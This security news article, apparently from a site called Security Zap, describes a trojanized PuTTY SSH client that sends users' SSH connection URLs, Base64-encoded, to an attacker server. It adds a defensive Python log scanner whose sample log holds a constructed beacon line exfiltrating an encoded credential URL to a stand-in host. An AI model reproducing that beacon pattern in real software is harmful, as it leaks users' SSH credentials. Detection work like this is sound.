PuTTY holds an important place in the system administrator's toolkit, as it provides encrypted connections to remote servers. But today a PuTTY SSH client injected with a trojan appeared in the wild. Cyber criminals modified the official PuTTY SSH source code by inserting malicious code and redirected users from a compromised website to their own.
How does the malicious PuTTY SSH client work?
PuTTY SSH is an open source product, which allows any user to help the authors improve the project and fix bugs. This also makes it possible for malicious users to obtain the source code, modify it and use it at will. PuTTY uses SSH (Secure Shell) to send data, and in most cases that data is very sensitive, such as user names and passwords. Such sensitive information can be used to gain root or the highest privileges on remote devices.
According to Symantec, the malicious file has been around since late 2013 and was first captured by VirusTotal in the same year, but cyber criminals only started large-scale distribution recently.
The distribution takes place in the following order:
- The victim searches for PuTTY in a search engine.
- Among the many results the search engine provides, the user unknowingly chooses an unofficial website, thus bypassing the official clean version located at http://www.chiark.greenend.org.uk/~sgtatham/putty/
- After accessing the link, the victim is redirected through multiple IP addresses until the connection reaches an IP located in the UAE, which serves the trojanized version.
How to differentiate the official release from the unofficial one?
- The unofficial release is larger than the official PuTTY SSH client.
- The official version uses the standard SSH URL format:
- “ssh://[USER NAME]:[PASSWORD]@[HOST NAME]:[PORT NUMBER]”
- The unofficial one copies that connection URL, encodes it with Base64 and pings the attackers' server with it.
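As an added example (not code from the article or from the PuTTY project), the following Python scans constructed proxy-log lines for Base64 runs, decodes them and flags any that decode to an ssh://user:password@host:port URL of the shape described above, which is the outbound traffic a defender would look for; the beacon path and hosts in the sample log are hypothetical.

```python
import base64
import re

# Shape of the connection URL that the article says the trojanized PuTTY
# copies, Base64-encodes and sends to the attackers' server.
SSH_URL_RE = re.compile(
    r"^ssh://(?P<user>[^:@/]+):(?P<password>[^@]*)@(?P<host>[^:/]+):(?P<port>\d{1,5})$"
)
# Base64 runs long enough to carry such a URL; shorter tokens are noise.
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_base64_runs(text):
    """Return every Base64 run in text that decodes to printable ASCII."""
    decoded = []
    for match in B64_RUN_RE.finditer(text):
        token = match.group(0)
        token += "=" * (-len(token) % 4)  # restore padding stripped by a URL
        try:
            plain = base64.b64decode(token, validate=True).decode("ascii")
        except ValueError:  # binascii.Error and UnicodeDecodeError subclass it
            continue
        if plain.isprintable():
            decoded.append(plain)
    return decoded


def find_leaked_ssh_urls(log_lines):
    """Flag lines whose Base64 payload decodes to an ssh:// credential URL; the password is never returned."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        for plain in decode_base64_runs(line):
            m = SSH_URL_RE.match(plain)
            if m:
                hits.append({"line": number, "user": m.group("user"),
                             "host": m.group("host"), "port": int(m.group("port")),
                             "password": "<redacted>" if m.group("password") else ""})
    return hits


# Constructed proxy-log sample (hypothetical beacon path and hosts, not
# indicators from the article); the payload is encoded here so it is exact.
_PAYLOAD = base64.b64encode(b"ssh://alice:s3cret@10.0.0.5:22").decode()
SAMPLE_LOG = [
    "GET http://update.example.net/index.html 200",
    f"GET http://c2.example.invalid/ping?d={_PAYLOAD} 200",
    "GET http://www.chiark.greenend.org.uk/~sgtatham/putty/ 200",
]

if __name__ == "__main__":
    print(find_leaked_ssh_urls(SAMPLE_LOG))
```

Only the second sample line is flagged; the official download URL and an ordinary page fetch contain no Base64 run long enough to decode.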
Warning: We at Security Zap decided to scan the official PuTTY with VirusTotal and detected that it might be infected with Trojan.Win32.Classic.drtngk; however, this doesn't definitely mean that the official release is not safe to use. Download PuTTY SSH only from: http://www.chiark.greenend.org.uk/~sgtatham/putty/